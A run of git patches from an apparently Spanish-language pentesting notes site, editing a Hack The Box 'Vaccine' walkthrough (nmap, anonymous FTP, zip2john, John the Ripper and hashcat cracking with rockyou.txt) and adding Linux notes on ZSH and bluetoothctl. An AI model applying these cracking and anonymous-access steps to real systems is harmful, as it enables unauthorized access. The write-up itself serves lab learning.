From 0a8f2d4f13f1ce5d5433c7fb1cd2cfbeaaeb406d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:30:37 +0200
Subject: [PATCH 0148/1701] Create HTB-Vaccine.md
From d3e8e2b25ed0910d0b102d5ca6b46d2fed365e21 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:37:41 +0200
Subject: [PATCH 0149/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 62 +++++++++++++++++------------------
1 file changed, 31 insertions(+), 31 deletions(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 48f90f50fa7..856e6e165d3 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -25,13 +25,13 @@ Ahora podemos escanear los puertos mediante nmap.
nmap -p- --open -T5 -n -v [Ip Víctima] -oG allPorts
-Esto nos guardará los puertos abiertos en el archivo 'allPorts' por si posteriormente queremos revisarlos
-de manera rápida accediendo al archivo guardado en nuestro directorio mediante la herramienta 'extractPorts'.
+Esto nos guardará los puertos abiertos en el archivo `allPorts` por si posteriormente queremos revisarlos
+de manera rápida accediendo al archivo guardado en nuestro directorio mediante la herramienta `extractPorts`.

Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
- [ExtractPorts](https://f1r0x.github.io/ExtractPorts.html)
+ [ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)

@@ -57,18 +57,18 @@ Ahora pasaremos a realizar un escaneo más exhaustivo utilizando una serie de sc

-Este escaneo, al igual que el anterior, nos guardará los resultados en nuestro directorio en el archivo 'target'.
-Para abrir este archivo podemos utilizar el comando 'cat'.
+Este escaneo, al igual que el anterior, nos guardará los resultados en nuestro directorio en el archivo `target`.
+Para abrir este archivo podemos utilizar el comando `cat`.
### Recopilación de los resultados:
- Puerto 21/tcp:
Algo interesante que podemos observar en el reporte de nmap es que el puerto 21/tcp permite el acceso mediante
-el inicio de sesión Anonymous. Este inicio de sesión por defecto nos permite entrar con el usuario 'anonymous'
+el inicio de sesión Anonymous. Este inicio de sesión por defecto nos permite entrar con el usuario `anonymous`
y sin necesidad de utilizar contraseña.
-También podemos observar que se encuentra un archivo disponible 'backup.zip'.
+También podemos observar que se encuentra un archivo disponible `backup.zip`.
- Puerto 22/tcp:
@@ -86,16 +86,16 @@ hasta una página de registro:
Tras probar los usuarios y contraseñas más comunes no conseguimos entrar, por tanto, seguiremos investigando.
En primer luegar, vamos a tratar de acceder como el usuario 'anonymous' por el puerto 80 que utiliza un servicio FTP
-y descargar el archivo 'backup.zip'.
+y descargar el archivo `backup.zip`.
-Para ello emplearemos el comando 'ftp' y especificando el usuario 'anonymous', luego nos pedirá una contraseña,
+Para ello emplearemos el comando `ftp` y especificando el usuario `anonymous`, luego nos pedirá una contraseña,
como este usuario no requiere de contraseñas, simplemente presionamos Enter.
ftp [Ip Víctima]

-Ahora, mediante un 'ls' o un 'dir', vamos a tratar de ver que archivos encontramos:
+Ahora, mediante un `ls` o un `dir`, vamos a tratar de ver que archivos encontramos:

@@ -106,12 +106,12 @@ utilizar PASV. Para ello, debemos activar el modo pasivo:

-Tras activar el modo activo ya podremos utilizar el comando 'ls':
+Tras activar el modo activo ya podremos utilizar el comando `ls`:

-Podemos ver que tenemos aquí el archvivo 'backup.zip'. Para tratar de descargarlo utilizaremos el comando 'get'.
-Recordar que podeis ver todos los comandos disponibles dentro se la shell de ftp utilizando el comando 'help'.
+Podemos ver que tenemos aquí el archvivo 'backup.zip'. Para tratar de descargarlo utilizaremos el comando `get`.
+Recordar que podeis ver todos los comandos disponibles dentro se la shell de ftp utilizando el comando `help`.

@@ -121,31 +121,31 @@ Para descargar el archivo.zip:

-Tener en cuenta que la shell está es muy inestable, en caso de error o de reportaros un 'Not Service' cerrar la shell
-con el comando 'exit' y volver a iniciar la shell siguiendo todos los pasos de manera continua, ya que a los pocos
+Tener en cuenta que la shell está es muy inestable, en caso de error o de reportaros un `Not Service` cerrar la shell
+con el comando `exit` y volver a iniciar la shell siguiendo todos los pasos de manera continua, ya que a los pocos
minutos, se desconecta.
Una vez descargado el archivo.zip, cerramos la shell ftp y nos derigimos al directorio donde hemos descargado el
-arhcivo 'backup.zip'.
+arhcivo `backup.zip`.

Como podeís ver, tenemos los dos archivos previamente creados con nmap (allPorts y target) y nuestro archivo .zip.
-Vamos a crear un directorio mediante 'mkdir' llamado 'Backup' y vamos a introducir el archivo .zip para luego tratar
+Vamos a crear un directorio mediante 'mkdir' llamado `Backup`y vamos a introducir el archivo .zip para luego tratar
de descomprimirlo.
mkdir Backup
mv backup.zip ./Backup/
-Una vez dentro del nuevo directorio, aplicaremos el comando 'unzip' para tratar de descomprimirlo:
+Una vez dentro del nuevo directorio, aplicaremos el comando `nzip`para tratar de descomprimirlo:
unzip backup.zip

-Al intentar descomprimir el archivo nos pide una contraseña, como desconozco la contraseña, presionado 'Enter'
+Al intentar descomprimir el archivo nos pide una contraseña, como desconozco la contraseña, presionado `Enter`
podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.php y style.css):

@@ -161,31 +161,31 @@ Nos posicionamos en el directorio donde se encuentre el archivo backup.zip:

-En primer lugar, vamos a extraer el hash del archivo 'backup.zip', para ello utilizaremos el comando zip2john y
-guardaremos los resultados en un archivo nuevo que llamaremos 'hash1':
+En primer lugar, vamos a extraer el hash del archivo `backup.zip`, para ello utilizaremos el comando zip2john y
+guardaremos los resultados en un archivo nuevo que llamaremos `hash1`:
zip2john 'backup.zip' > hash1

-Como podemos ver, se nos ha generado un nuevo archivo en nuestro directorio actual con el nombre de 'hash1'.
+Como podemos ver, se nos ha generado un nuevo archivo en nuestro directorio actual con el nombre de `hash1`.

-Mediante 'cat' podemos ver su contenido, el hash extraído del archivo .zip.
+Mediante `cat` podemos ver su contenido, el hash extraído del archivo .zip.
cat hash1

Perfecto, ya tenemos nuestro hash listo para explotarlo, ahora mediante la herramienta John, vamos a tratar de
-descifrar el 'hash' mediante un diccionario de fuerza bruta llamado rockyou.txt. Rockyou.txt es un diccionario
+descifrar el `hash` mediante un diccionario de fuerza bruta llamado `rockyou.txt`. Rockyou.txt es un diccionario
con más de 14 millones de contraseñas, el cual se puede encontrar por internet en distintos repositorios.
-Es aconsejable alojar el archivo rockyou.txt en la ruta '/usr/share/wordlists/'.
+Es aconsejable alojar el archivo rockyou.txt en la ruta `/usr/share/wordlists/`.
-Para ejecutar el ataque por diccionario con John, utilizaremos la variable '--wordlist' especificando la ruta del
-diccionario, y luego, también especificamos el archivo que queremos tratar de descifrar, en nuestro caso 'hash1':
+Para ejecutar el ataque por diccionario con John, utilizaremos la variable `--wordlist` especificando la ruta del
+diccionario, y luego, también especificamos el archivo que queremos tratar de descifrar, en nuestro caso `hash1`:
john --worlist=/usr/share/wordlists/rockyou.txt hash
@@ -194,7 +194,7 @@ diccionario, y luego, también especificamos el archivo que queremos tratar de d
Como podemos ver, la herramienta John enseguida nos reporta que ha procesado 1 contraseña y que no quedan más hashes
que crackear.
-Para poder ver la contraseña simplemente utilizamos John con la variable '--show' y especificar el archivo.
+Para poder ver la contraseña simplemente utilizamos John con la variable `--show` y especificar el archivo.
john --show hash1
@@ -216,14 +216,14 @@ Y podemos ver como ya tenemos los archivos index.php y style.css en nuestro dire
Tras revisar el archivo index.php, podemos ver como es una copia del código fuente de la página de inicio de sesión
anterior.
Pero si nos fijamos, incluye unas líneas adicionales. Para ver el código fuente podemos abrir el archivo
-index.php mediante 'cat' o dirigirnos a la url http://[Ip Víctima]/index.php (la página es visualmente es igual) y
+`index.php` mediante `cat` o dirigirnos a la url `http://[Ip Víctima]/index.php` (la página es visualmente es igual) y
con clic derecho sobre la página y 'ver código fuente'.
cat index.php

-El apartado que a nosotros nos interesa es el 'session_start', donde nos reporta un nombre de usuario 'admin' y un
+El apartado que a nosotros nos interesa es el `session_start`, donde nos reporta un nombre de usuario `admin` y un
hash de una contraseña.

@@ -319,7 +319,7 @@ Bien, ya lo tenemos todo preparado para ejecutar HashCat, para ello, ejecutamos
hashcat -a 0 -m 0 'Número Hash' /usr/share/wordlists/rockyou.txt
--a : Attack-mode. El 0 representa el modo 'Straight'.
+-a : Attack-mode. El 0 representa el modo `Straight`.
-m : Hash-type. El 0 representa MD5. Esto lo podemos ver con el comando `hashcat --help`.
From b0ca474f3ad44ca1b5587a3b22af901ab19358a3 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:42:16 +0200
Subject: [PATCH 0150/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 856e6e165d3..b306639e954 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -31,7 +31,7 @@ de manera rápida accediendo al archivo guardado en nuestro directorio mediante

Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
- [ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
+ [ExtractPorts](./Starting Point/ExtractPorts.html)

From edc7209504d4cf09531f58b24c524c9b51e0422e Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:44:57 +0200
Subject: [PATCH 0151/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index b306639e954..46deb00c8b4 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -31,7 +31,7 @@ de manera rápida accediendo al archivo guardado en nuestro directorio mediante

Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
- [ExtractPorts](./Starting Point/ExtractPorts.html)
+ [ExtractPorts](./f1r0x.github.io/Herramientas_y_Scripts/ExtractPorts.md)

From cf3ed072ab8760278b8fa60043ee10a5af0411fe Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:45:27 +0200
Subject: [PATCH 0152/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 46deb00c8b4..d0b54135ae6 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -31,7 +31,7 @@ de manera rápida accediendo al archivo guardado en nuestro directorio mediante

Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
- [ExtractPorts](./f1r0x.github.io/Herramientas_y_Scripts/ExtractPorts.md)
+ [ExtractPorts](f1r0x.github.io/Herramientas_y_Scripts/ExtractPorts.md)

From d2d3ebc5ca949caa65cd594fa148179e8cf78864 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:46:48 +0200
Subject: [PATCH 0153/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index d0b54135ae6..a045460fda4 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -31,7 +31,7 @@ de manera rápida accediendo al archivo guardado en nuestro directorio mediante

Puedes encontrar la descripción y la herramienta extractPorts creada por S4vitar en mi repositorio:
- [ExtractPorts](f1r0x.github.io/Herramientas_y_Scripts/ExtractPorts.md)
+ [ExtractPorts](../Herramientas_y_Scripts/ExtractPorts.md)

From 7b3b5b35baa356c6f6af2cd39964f55235f4fe1c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:49:45 +0200
Subject: [PATCH 0154/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index a045460fda4..3f801fe4edd 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -153,7 +153,7 @@ podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.ph
Como desconocemos la contraseña, vamos a utilizar la herramienta John the Ripper para tratar de descifrarla. En
caso de no tener la herramienta instalada o queráis leer más sobre ella podréis encontrarlo en el siguiente enlace:
-[John the Ripper](./Herramientas_y_Scripts/john_the_ripper.html)
+[John the Ripper](../Herramientas_y_Scripts/john_the_ripper.html)
### John the Ripper:
@@ -247,7 +247,7 @@ Tenemos un hash, pero aún no sabemos en qué tipo de algoritmo está basado. Pa
Hashid, la cual nos reportará el tipo de algoritmo más probable que se utilizó en su día para crear ese hash a
partir de una contraseña.
-Podéis encontrar más información aquí: [HashID](./Herramientas_y_Scripts/HashId.html)
+Podéis encontrar más información aquí: [HashID](../Herramientas_y_Scripts/HashId.html)
Para instalar la herramienta:
@@ -269,7 +269,7 @@ voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más p
Está herramienta hace básicamente lo mismo que HashId, nos reporta el algoritmo del hash deseado, con la diferencia
de que Hash-Identifier es algo más precisa a la hora de reportar los resusltados.
-Podéis encontrar más información aquí: [Hash Identifier](./Herramientas_y_Scripts/Hash-Identifier.html)
+Podéis encontrar más información aquí: [Hash Identifier](../Herramientas_y_Scripts/Hash-Identifier.html)
Para instalar:
@@ -300,7 +300,7 @@ Para ello, vamos a ver dos formas de crakear un hash, en primer lugar utilizarem
### HashCat:
-[HashCat](./Herramientas_y_Scripts/HashCAt.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
+[HashCat](../Herramientas_y_Scripts/HashCAt.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
lugar, crearemos un arhivo llamado `hash2` donde guardamos el hash a descifrar.
Para crear el archivo:
From 06009275d418f84e9d86768c1ba9756488153161 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:55:38 +0200
Subject: [PATCH 0155/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 3f801fe4edd..1b32a5a88c2 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -300,7 +300,7 @@ Para ello, vamos a ver dos formas de crakear un hash, en primer lugar utilizarem
### HashCat:
-[HashCat](../Herramientas_y_Scripts/HashCAt.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
+[HashCat](../Herramientas_y_Scripts/HashCat.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
lugar, crearemos un arhivo llamado `hash2` donde guardamos el hash a descifrar.
Para crear el archivo:
From c81eadccb087f2cb906cd8d4d89add6506830c46 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 18:38:17 +0200
Subject: [PATCH 0156/1701] Create ZSH.md
---
"Linux/Introducci\303\263n_a_Linux/ZSH.md" | 60 ++++++++++++++++++++++
1 file changed, 60 insertions(+)
create mode 100644 "Linux/Introducci\303\263n_a_Linux/ZSH.md"
diff --git "a/Linux/Introducci\303\263n_a_Linux/ZSH.md" "b/Linux/Introducci\303\263n_a_Linux/ZSH.md"
new file mode 100644
index 00000000000..e0a740b1679
--- /dev/null
+++ "b/Linux/Introducci\303\263n_a_Linux/ZSH.md"
@@ -0,0 +1,60 @@
+# ZSH
+
+ZSH es un poderoso interprete de comandos para sistemas Unix. Construido sobre el popular shell bash. Es, gratuito, de código abierto y se
+actualiza periodicamente.
+
+Ventas:
+
+1. Altamente personalizable.
+2. Proporciona herramientas interactivas.
+3. Utiliza el lenguaje de comandos bash.
+4. Admite marcos adicionales como oh-my-zsh.
+5. Más fácil y con gran comunidad.
+
+## Instalación:
+Para poder instalarlo en una distribución Debian (ParrotOS o Kali) primero actualizamos el sistema:
+
+ sudo apt-get update
+
+Luego iniciamos la instalación:
+
+ sudo apt-get install zsh -y
+
+## Ejecutar ZSH como shell predeterminada:
+Para ejecutar ZSH de forma automatica cada vez que iniciemos sesión y establecerla podemos hacerlo de dos maneras.
+La primera es ejecutando el siguiente comando:
+
+ chsh -s $(wich zsh)
+
+Una vez hecho esto, reiniciamos el sistema y comprobamos que funcione. En caso de no funcionar, tendremos que hacerlo de forma manual.
+Para ello abrimos el archivo `.bashrc` con el siguiente comando:
+
+ sudo nano ~/.bashrc
+
+Una vez abierto el arhcivo `.bashrc` escribiremos 'exec zsh` en la parte superior del archivo. De esta manera se ejecutará el comando `zsh`
+cada vez que se cargue la terminal.
+
+**Nota**: Se debe de terner mucho cuidado al realizar esta instalación y no realizarlo durante otros procesos ya que al realizar estos cambios
+puede que se interrumpan todos los trabajos interactivos.
+
+## Versión:
+Para asegurarnos que tenemos la ZSH instalada podemos comprobarlo y ver la versión exacta mediante el comando:
+
+ zsh --version
+
+## Configuración de la ZSH:
+
+ZSH tiene cinco archivos de configuración principales. Esos archivos son: `.zshenv`, `.zprofile`, `.zshrc`, `.zlogin` y `.zlogout`.
+
+La ZSH funciona leyendo el archivo `.zshenv` a menos que se especifique el argumento `-f` al iniciar la sesión del shell.
+
+`.zshenv` : Solo debe contener las variables de entorno del usuario. No debe contener comandos que adjunten sescuencias de entrada/salida estandar (TTY).
+
+`.zprofile` : Contiene comando ejecutados en el inicio de sesión del shell. Solo debe usarse para ejecutar comandos externos.
+
+`.zshrc` : Contiene las configuraciones y los comandos del shell. Se obtiene en shells interactivos y contien alias, enlaces de taclas, variables y funciones.
+
+`.zlogin` : Este archivo es similar a .zprofile. No debe contener ningún comando que altere el entorno.
+
+`.zlogout` : Se lee cuando se cierra la sesión de la shell. Puede usarse para configurar los comandos que se ejecutan cuando se cierra el shell.
+
From 735824d9a3a73a0cdbc998e1cbbdb7cc7f77d086 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 18:42:14 +0200
Subject: [PATCH 0157/1701] Update index.md
---
index.md | 6 ++++++
1 file changed, 6 insertions(+)
diff --git a/index.md b/index.md
index d3d2ab9b649..f1c9902b0a8 100644
--- a/index.md
+++ b/index.md
@@ -11,6 +11,8 @@
---
# Artículos
+[Linux](./Linux/Linux.html)
+
[Fase de Reconocimiento - HTB](./Artículos/Fase_de_reconocimiento-HTB.html)
[¿Como conectarse a Htb?](./Artículos/Como_conectarse_a_HTB.html)
@@ -53,6 +55,10 @@ Escaneo de vulnerabilidades en páginas WordPress.
## SQL:
[SQLmap](./Herramientas_y_Scripts/SQLmap.html)
+---
+
+
+
From 5c47fcb448dd0e562902d036d4efee56a902e064 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 18:45:32 +0200
Subject: [PATCH 0158/1701] Create Linux.md
---
Linux/Linux.md | 7 +++++++
1 file changed, 7 insertions(+)
create mode 100644 Linux/Linux.md
diff --git a/Linux/Linux.md b/Linux/Linux.md
new file mode 100644
index 00000000000..7aa69ce7dac
--- /dev/null
+++ b/Linux/Linux.md
@@ -0,0 +1,7 @@
+# Linux
+
+Gran variedad de artículos basdos en el ecosistema Linux.
+
+## Gestor de Comandos:
+
+[ZSH](./ZSH)
From 34d1f1071f2ed62ee4e14e2ed0008d01d053c0d0 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 18:50:18 +0200
Subject: [PATCH 0159/1701] Update Linux.md
---
Linux/Linux.md | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index 7aa69ce7dac..3b870834bb5 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -2,6 +2,11 @@
Gran variedad de artículos basdos en el ecosistema Linux.
+## Programas de Descargas:
+### Torrent:
+
+[Aria2](./Programas_para_Linux/Aria2.html)
+
## Gestor de Comandos:
-[ZSH](./ZSH)
+[ZSH](./ZSH.html)
From 5583fa96f610123c30c2a56c135a30402b9dc710 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 18:52:25 +0200
Subject: [PATCH 0160/1701] Update Linux.md
---
Linux/Linux.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index 3b870834bb5..749c61e8ded 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -5,8 +5,8 @@ Gran variedad de artículos basdos en el ecosistema Linux.
## Programas de Descargas:
### Torrent:
-[Aria2](./Programas_para_Linux/Aria2.html)
+[Aria2](../Linux/Programas_para_Linux/Aria2.html)
## Gestor de Comandos:
-[ZSH](./ZSH.html)
+[ZSH](../Linux/ZSH.html)
From b73b5359fbe051975551c87ebd57c8826c65c07a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 18:55:29 +0200
Subject: [PATCH 0161/1701] Update Linux.md
---
Linux/Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index 749c61e8ded..a6c43fa911a 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -9,4 +9,4 @@ Gran variedad de artículos basdos en el ecosistema Linux.
## Gestor de Comandos:
-[ZSH](../Linux/ZSH.html)
+[ZSH](../Linux/Introducción_a_Linux/ZSH.html)
From 8b63f93e808d11aac1a5fcbdf1cb0f54d65508bc Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 18:56:03 +0200
Subject: [PATCH 0162/1701] Rename Aria2 to Aria2.md
---
Linux/Programas_para_Linux/{Aria2 => Aria2.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Linux/Programas_para_Linux/{Aria2 => Aria2.md} (100%)
diff --git a/Linux/Programas_para_Linux/Aria2 b/Linux/Programas_para_Linux/Aria2.md
similarity index 100%
rename from Linux/Programas_para_Linux/Aria2
rename to Linux/Programas_para_Linux/Aria2.md
From a0bc7cf97ebf108346e4d0f309412e08626edf6f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:19:16 +0200
Subject: [PATCH 0163/1701] Update ZSH.md
---
"Linux/Introducci\303\263n_a_Linux/ZSH.md" | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/ZSH.md" "b/Linux/Introducci\303\263n_a_Linux/ZSH.md"
index e0a740b1679..ee71432ae29 100644
--- "a/Linux/Introducci\303\263n_a_Linux/ZSH.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/ZSH.md"
@@ -31,7 +31,7 @@ Para ello abrimos el archivo `.bashrc` con el siguiente comando:
sudo nano ~/.bashrc
-Una vez abierto el arhcivo `.bashrc` escribiremos 'exec zsh` en la parte superior del archivo. De esta manera se ejecutará el comando `zsh`
+Una vez abierto el arhcivo `.bashrc` escribiremos `exec zsh` en la parte superior del archivo. De esta manera se ejecutará el comando `zsh`
cada vez que se cargue la terminal.
**Nota**: Se debe de terner mucho cuidado al realizar esta instalación y no realizarlo durante otros procesos ya que al realizar estos cambios
From 0be78f71e010e812d0a595f64ba2f91a45c013be Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:21:10 +0200
Subject: [PATCH 0164/1701] Update ExtractPorts.md
---
Herramientas_y_Scripts/ExtractPorts.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Herramientas_y_Scripts/ExtractPorts.md b/Herramientas_y_Scripts/ExtractPorts.md
index 78f53f5f111..8edc4fdb304 100644
--- a/Herramientas_y_Scripts/ExtractPorts.md
+++ b/Herramientas_y_Scripts/ExtractPorts.md
@@ -15,7 +15,7 @@ Mediante `Cntrl + Shift + v` podremos pegar los puertos a la terminal automátic
`Cntrl + Shift + v` : Para pegar los puertos a la terminal.
- ## Instalación:
+## Instalación:
Para la instalación de esta herramienta previamente se recomienda tener instalado 'bat' que es una mejora del comando 'cat'.
From ce70d96c7b05b3676218651183e704a44140c6c7 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:29:47 +0200
Subject: [PATCH 0165/1701] Update Linux.md
---
Linux/Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index a6c43fa911a..86082d76096 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -1,3 +1,5 @@
+
+
# Linux
Gran variedad de artículos basdos en el ecosistema Linux.
From 28a096e072fa16a854eae6ece40cd4426c53c755 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:31:22 +0200
Subject: [PATCH 0166/1701] Update Linux.md
---
Linux/Linux.md | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index 86082d76096..723a36fd57c 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -1,14 +1,12 @@

-# Linux
-
Gran variedad de artículos basdos en el ecosistema Linux.
-## Programas de Descargas:
+# Programas de Descargas:
### Torrent:
[Aria2](../Linux/Programas_para_Linux/Aria2.html)
-## Gestor de Comandos:
+# Gestor de Comandos:
[ZSH](../Linux/Introducción_a_Linux/ZSH.html)
From 135a682725cc74b1a7bb6802e19de336f934b162 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:34:06 +0200
Subject: [PATCH 0167/1701] Update HashId.md
---
Herramientas_y_Scripts/HashId.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Herramientas_y_Scripts/HashId.md b/Herramientas_y_Scripts/HashId.md
index dbfb60fb42d..9cdf6225744 100644
--- a/Herramientas_y_Scripts/HashId.md
+++ b/Herramientas_y_Scripts/HashId.md
@@ -1,4 +1,4 @@
-# HashID
+
Hashid es una herramienbta que nos reportará el tipo de algoritmo más probable que se utilizó en su día para crear
ese hash a partir de una contraseña.
From 72aeb0dfd40e7e5b43a694353a87db58dc28ead6 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:35:03 +0200
Subject: [PATCH 0168/1701] Update Linux.md
---
Linux/Linux.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index 723a36fd57c..d0fc409d5ec 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -2,11 +2,11 @@
Gran variedad de artículos basdos en el ecosistema Linux.
-# Programas de Descargas:
+## Programas de Descargas:
### Torrent:
[Aria2](../Linux/Programas_para_Linux/Aria2.html)
-# Gestor de Comandos:
+## Gestor de Comandos:
[ZSH](../Linux/Introducción_a_Linux/ZSH.html)
From 3547370ec9b6b1d025a8ba6e039c89713ebd3110 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:47:30 +0200
Subject: [PATCH 0169/1701] Create Bluetoothctl
---
.../Introducci\303\263n_a_Linux/Bluetoothctl" | 28 +++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 "Linux/Introducci\303\263n_a_Linux/Bluetoothctl"
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl"
new file mode 100644
index 00000000000..ace0809db15
--- /dev/null
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl"
@@ -0,0 +1,28 @@
+# Administrados de bluetooth de Linux.
+
+Para poder abrir el gestor de bluetooth desde la terminal de Linux, utilizaremos el siguiente comando:
+
+ bluetoothctl
+
+Para ver todos los comandos disponibles podemos ejecutar el siguiente comando o una vez dentro de la shell
+de bluetoothctl escribir `help`:
+
+ bluetoot help
+
+Para realizar una busqueda de los dispositivos:
+
+ scan on
+
+Para detener la busqueda:
+
+ scan off
+
+Para conectarnos con un dispositivo:
+
+ connect [Núm MAC]
+
+El `número MAC` es el número que corresponde con el dispositivo que se nos muestra en el escaneo.
+
+Una vez conectados podemos salir de la shell simplemente escribiendo `exit`.
+
+
From 6c1988c474c735efd4035a2fa353b0e0b98d9c7f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:49:49 +0200
Subject: [PATCH 0170/1701] Update Linux.md
---
